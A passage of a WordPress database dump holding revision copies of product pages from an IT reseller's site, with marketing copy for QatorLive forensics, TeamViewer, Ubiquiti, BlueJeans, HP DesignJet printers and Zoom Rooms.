various and vital data with ease.\r\nThe program runs from USB device therefore itâ€™s convenient and easy-to-use.\r\nBy using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.\r\nSoftware is built easily so that even non-experts wonâ€™t have problems using it\r\n\r\n<img class=\"alignnone wp-image-2126 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-300x193.png\" alt=\"\" width=\"300\" height=\"193\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-14 10:04:10','2018-12-14 02:04:10','',1573,'https://bintara.com.my/blog/2018/12/14/1573-revision-v1/',0,'revision','',0),(2130,1,'2018-12-14 10:05:22','2018-12-14 02:05:22','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n\r\n<strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\n<ul>\r\n 	<li>Collect evidence easily through rapid analysis of target system.</li>\r\n 	<li>Get necessary data through quick storage device scan.</li>\r\n 	<li>Collect various and vital data with ease.</li>\r\n 	<li>The program runs from USB device therefore itâ€™s convenient and easy-to-use.</li>\r\n 	<li>By using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.</li>\r\n 	<li>Software is built easily so that even non-experts wonâ€™t have problems using it</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2126 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-300x193.png\" alt=\"\" width=\"300\" height=\"193\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-14 10:05:22','2018-12-14 02:05:22','',1573,'https://bintara.com.my/blog/2018/12/14/1573-revision-v1/',0,'revision','',0),(2131,1,'2018-12-14 10:06:00','2018-12-14 02:06:00','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n<h3><strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.</h3>\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\n<ul>\r\n 	<li>Collect evidence easily through rapid analysis of target system.</li>\r\n 	<li>Get necessary data through quick storage device scan.</li>\r\n 	<li>Collect various and vital data with ease.</li>\r\n 	<li>The program runs from USB device therefore itâ€™s convenient and easy-to-use.</li>\r\n 	<li>By using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.</li>\r\n 	<li>Software is built easily so that even non-experts wonâ€™t have problems using it</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2126 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-300x193.png\" alt=\"\" width=\"300\" height=\"193\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-14 10:06:00','2018-12-14 02:06:00','',1573,'https://bintara.com.my/blog/2018/12/14/1573-revision-v1/',0,'revision','',0),(2132,1,'2018-12-14 10:07:37','2018-12-14 02:07:37','<img class=\"alignnone wp-image-2127 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live.jpg\" alt=\"\" width=\"294\" height=\"126\" />\r\n\r\n&nbsp;\r\n<h3><strong>QatorLive</strong> is live forensic solution to collect and analyze digital evidence on the spot.</h3>\r\n<h3><b>QatorLive</b><b> features</b></h3>\r\n<ul>\r\n 	<li>Collect evidence easily through rapid analysis of target system.</li>\r\n 	<li>Get necessary data through quick storage device scan.</li>\r\n 	<li>Collect various and vital data with ease.</li>\r\n 	<li>The program runs from USB device therefore itâ€™s convenient and easy-to-use.</li>\r\n 	<li>By using preset policies, itâ€™s possible to check the necessary data rapidly from a large number of scanned data.</li>\r\n 	<li>Software is built easily so that even non-experts wonâ€™t have problems using it</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2126 size-large\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator-live-1024x658.png\" alt=\"\" width=\"800\" height=\"514\" />\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Qator Live','','inherit','closed','closed','','1573-revision-v1','','','2018-12-14 10:07:37','2018-12-14 02:07:37','',1573,'https://bintara.com.my/blog/2018/12/14/1573-revision-v1/',0,'revision','',0),(2134,1,'2018-12-14 10:21:06','2018-12-14 02:21:06','<strong>TeamViewer</strong>Â focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.\r\n\r\n<img class=\"wp-image-1960 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Teamviewer-page.png\" alt=\"\" width=\"509\" height=\"257\" />\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\nWeâ€™re serious about security, and we put our customers and their clients first when it comes to protecting them with the latest in technology. Our infrastructure is ISO 27001 certified and completely HIPAA and SOC2 compliant:\r\n<ul>\r\n 	<li>256-bit AES Encryption</li>\r\n 	<li>Two-Factor Authentication</li>\r\n 	<li>SOC2 Certified and Compliant</li>\r\n 	<li>ISO 27001 Certification for Information Security Management</li>\r\n 	<li>HIPAA Compliant</li>\r\n 	<li>Brute Force Protection</li>\r\n 	<li>User &amp; IP Whitelisting</li>\r\n 	<li>Trusted Device Lists</li>\r\n 	<li>Enforced Password Reset</li>\r\n</ul>\r\n<div class=\"vc_row wpb_row vc_row-fluid wd-row wd-row--tertiary\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div class=\"wpb_column vc_column_container vc_col-sm-12 vc_col-md-8 vc_col-xs-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\">\r\n<h3>Connect to Your Desktop Remotely. Without Slow VPN or Network Security Restrictions Getting in Your Way.</h3>\r\n</div>\r\nSupported by a blazing-fast global network, TeamViewerâ„¢ free remote access softwareÂ tools enable you connect to your work computer, from anywhere, anytime. So you can continue working with desktop applications remotely. And access desktop files, as if you were sitting in front of your workstation. Quickly. Easily. Securely.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"overview\" class=\"vc_row wpb_row vc_row-fluid wd-row\" data-vc-full-width=\"true\" data-vc-full-width-init=\"true\">\r\n<div id=\"overview\" class=\"wpb_column vc_column_container vc_col-sm-12\">\r\n<div class=\"vc_column-inner\">\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element wd-margin-bottom-zero\">\r\n<div class=\"wpb_wrapper\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','TeamViewer','','inherit','closed','closed','','1605-revision-v1','','','2018-12-14 10:21:06','2018-12-14 02:21:06','',1605,'https://bintara.com.my/blog/2018/12/14/1605-revision-v1/',0,'revision','',0),(2135,1,'2018-12-14 10:48:04','2018-12-14 02:48:04','Technology platforms for Internet Access, Enterprise, and SmartHome applications.\r\n\r\nAll Ubiquiti product we provide :\r\n<ul>\r\n 	<li>ROUTING &amp; SWITCHING</li>\r\n 	<li class=\"comProductList__item__description\">WHOLE HOME WI-FI</li>\r\n 	<li>WIRELESS</li>\r\n 	<li>VOIP</li>\r\n 	<li>LEGACY</li>\r\n 	<li>CAMERAS</li>\r\n 	<li>OLT</li>\r\n 	<li>AP</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Ubiquiti','','inherit','closed','closed','','1606-autosave-v1','','','2018-12-14 10:48:04','2018-12-14 02:48:04','',1606,'https://bintara.com.my/blog/2018/12/14/1606-autosave-v1/',0,'revision','',0),(2136,1,'2018-12-14 10:47:56','2018-12-14 02:47:56','Technology platforms for Internet Access, Enterprise, and SmartHome applications.\r\n\r\nAll Ubiquiti product we provide :\r\n<ul>\r\n 	<li>ROUTING &amp; SWITCHING</li>\r\n 	<li class=\"comProductList__item__description\">WHOLE HOME WI-FI</li>\r\n 	<li>WIRELESS</li>\r\n 	<li>VOIP</li>\r\n 	<li>LEGACY</li>\r\n 	<li>CAMERAS</li>\r\n 	<li>OLT</li>\r\n 	<li>AP</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Ubiquiti','','inherit','closed','closed','','1606-revision-v1','','','2018-12-14 10:47:56','2018-12-14 02:47:56','',1606,'https://bintara.com.my/blog/2018/12/14/1606-revision-v1/',0,'revision','',0),(2139,1,'2018-12-14 10:56:32','2018-12-14 02:56:32','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h3 class=\"Section-title h2\">Modernize your meetings for today\'s work</h3>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h3 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h3>\r\nCloud-based meeting and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-14 10:56:32','2018-12-14 02:56:32','',2024,'https://bintara.com.my/blog/2018/12/14/2024-revision-v1/',0,'revision','',0),(2138,1,'2018-12-14 10:53:52','2018-12-14 02:53:52','Looking for a video conferencing solution for your business?\r\n\r\nChoose video conferencing solution that best fits your needs.\r\n\r\n&nbsp;','Video Conferencing Solutions','','inherit','closed','closed','','2003-revision-v1','','','2018-12-14 10:53:52','2018-12-14 02:53:52','',2003,'https://bintara.com.my/blog/2018/12/14/2003-revision-v1/',0,'revision','',0),(2140,1,'2018-12-14 10:57:02','2018-12-14 02:57:02','<header class=\"Section-header is-h2 u-textAlign--center\" aria-label=\"Header\">\r\n<h3 class=\"Section-title h2\">Modernize your meetings for today\'s work</h3>\r\n<p class=\"Section-subtitle\">BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.</p>\r\n<img class=\"wp-image-2029 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bluejean.png\" alt=\"\" width=\"637\" height=\"260\" />\r\n\r\n</header>\r\n<h2 class=\"Hero-title\" role=\"heading\">Why BlueJeans?</h2>\r\nCloud-based meeting and large interactive events that are simple, scalable, and secure.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Simple</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nSchedule, join and host one-touch meetings in just six seconds from anywhere, on any device or room system. Experience HD video and stunningly clear audio powered by Dolby VoiceÂ® in an intuitive, intelligent interface.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Modern</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nDrive meeting productivity within the digital workplace through seamless integration with your favorite scheduling, messaging and productivity tools. Leverage AI and voice recognition to make your meetings intelligent.\r\n<ul>\r\n 	<li class=\"Column-title h4 u-textAlign--left\"><strong>Trusted</strong></li>\r\n</ul>\r\n<div class=\"Column-body\">\r\n\r\nManage and troubleshoot meetings, events and rooms in real-time with an enterprise-grade platform that meets the most demanding management, security and scalability requirements.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/tFme2TnlumQ\" width=\"640\" height=\"360\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n</div>\r\n</div>\r\n</div>','BlueJeans','','inherit','closed','closed','','2024-revision-v1','','','2018-12-14 10:57:02','2018-12-14 02:57:02','',2024,'https://bintara.com.my/blog/2018/12/14/2024-revision-v1/',0,'revision','',0),(2141,1,'2018-12-14 11:01:23','2018-12-14 03:01:23','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T120_Gallery_image1_941x500_tcm245_2364857_tcm245_2372015_tcm245-2364857.jpg\" alt=\"HP DesignJet T120 Printer with architectural drawing output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T1700_Gallery_image1_941x500_tcm245_2540802_tcm245_2540822_tcm245-2540802.jpg\" alt=\"Right-facing view of HP DesignJet T1700 with colorful map output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T830_Gallery_image1_941x500_tcm245_2380328_tcm245_2380348_tcm245-2380328.jpg\" alt=\"HP DesignJet T830 Printer with colorful city view output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T3500_Gallery_image1_941x500_tcm245_2383669_tcm245_2383644_tcm245-2383669.jpg\" alt=\"Side view of the HP DesignJet T3500 Production Multifunction Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/1_tcm245_2638421_tcm245_2624395_tcm245-2638421.jpg\" alt=\"HP DesignJet Z6610 Production Printer with gold fashion ad for output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/Gallery_3_tcm245_2625574_tcm245_2625583_tcm245-2625574.jpg\" alt=\"Gold jewelry ad on HP DesignJet Z6810 Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-14 11:01:23','2018-12-14 03:01:23','',1528,'https://bintara.com.my/blog/2018/12/14/1528-revision-v1/',0,'revision','',0),(2508,1,'2018-12-18 23:29:12','2018-12-18 15:29:12','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2502\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2503\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" />\r\n\r\n&nbsp;\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2504\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2505\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2506\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone  wp-image-2507\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-18 23:29:12','2018-12-18 15:29:12','',1528,'https://bintara.com.my/blog/2018/12/18/1528-revision-v1/',0,'revision','',0),(3051,1,'2019-03-11 15:09:25','2019-03-11 07:09:25','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3><h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p><h4>HD video and audio</h4><p>Bring high quality video, audio, and web conferencing to your existing rooms.</p><h4>Wireless sharing</h4><p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p><h4>Interoperability with any video system</h4><p>Communicate with existing SIP or H.323 systems</p><h4>Meet with anyone</h4><p>Include remote participants on desktop, mobile, or other conference room systems.</p><h4>One touch to start meetings</h4><p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p><h4>Centralized management</h4><p>Get the overview status and management of deployed conference rooms in a single admin console</p>		\n			<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>		\n		<h3>Zoom for theÂ Conference Room</h3>\n<h4>Simple, flexible set up</h4>\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\n<h4>Modern capabilities</h4>\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\n<h4>Happy, productive users</h4>\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\n&nbsp;\n<h3>Capabilities that enhance the way people work</h3>\n<h4>HD video and audio</h4>\n<p>Bring high quality video, audio, and web conferencing to your existing rooms.</p>\n<h4>Wireless sharing</h4>\n<p>Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.</p>\n<h4>Interoperability with any video system</h4>\n<p>Communicate with existing SIP or H.323 systems</p>\n<h4>Meet with anyone</h4>\n<p>Include remote participants on desktop, mobile, or other conference room systems.</p>\n<h4>One touch to start meetings</h4>\n<p>Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring system.</p>\n<h4>Centralized management</h4>\n<p>Get the overview status and management of deployed conference rooms in a single admin console.</p>\n&nbsp;\n<h3>Already have an existing video conference room system?</h3>\nUse Zoomâ€™s Conference Room Connector to extend your standards-based conference systems to the cloud. Zoomâ€™s Conference Room Connector helps organizations leverage existing products through its life-cycle while delivering a consistent and unified communication experience.\n&nbsp;\n<h3>Zoom Rooms includes the following value-added services at no additional cost.</h3>\n<h4>Digital Signage</h4>\nDigital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.\n<ul>\n 	<li>Leverage room displays when not in use</li>\n 	<li>Manage displays at scale or individually</li>\n 	<li>Unlimited amount of displays supported (both in and out of conference rooms)</li>\n</ul>\n<h4>Scheduling Display</h4>\nEnd scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.\n<h4>Make interactive collaboration easy with touch screens</h4>\nPower up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation all at the tip of your fingers.\n<h4>Flawless video conferencing for every space</h4>\nUnleash the power of cloud-based video conferencing anywhere work gets done.\n[maxbutton id=\"1\" ]','Zoom','','inherit','closed','closed','','1620-revision-v1','','','2019-03-11 15:09:25','2019-03-11 07:09:25','',1620,'https://bintara.com.my/blog/2019/03/11/1620-revision-v1/',0,'revision','',0),(3049,1,'2019-03-11 15:00:29','2019-03-11 07:00:29','<h2>Zoom for the Conference Room</h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing</h3><h3>Simple, flexible set up</h3><p>Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.</p><h3>Modern capabilities</h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.</p><h3>Happy, productive users</h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<h3>Zoom for theÂ Conference Room</h3>\n<h4>Simple, flexible set up</h4>\nBuild the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.\n<h4>Modern capabilities</h4>\nDeploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.\n<h4>Happy, productive users</h4>\nWe focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.\n&nbsp;\n<h3>Capabilities that enhance the way people work</h3>\n<h4>HD video and audio</h4>\n<p>Bring high quality video, audio, and web conferencing to your existing rooms.</p>\n<h4>Wireless sharing</h4>\n<p>Cut the cords, cables, and dongles -- present content wirelessly from your 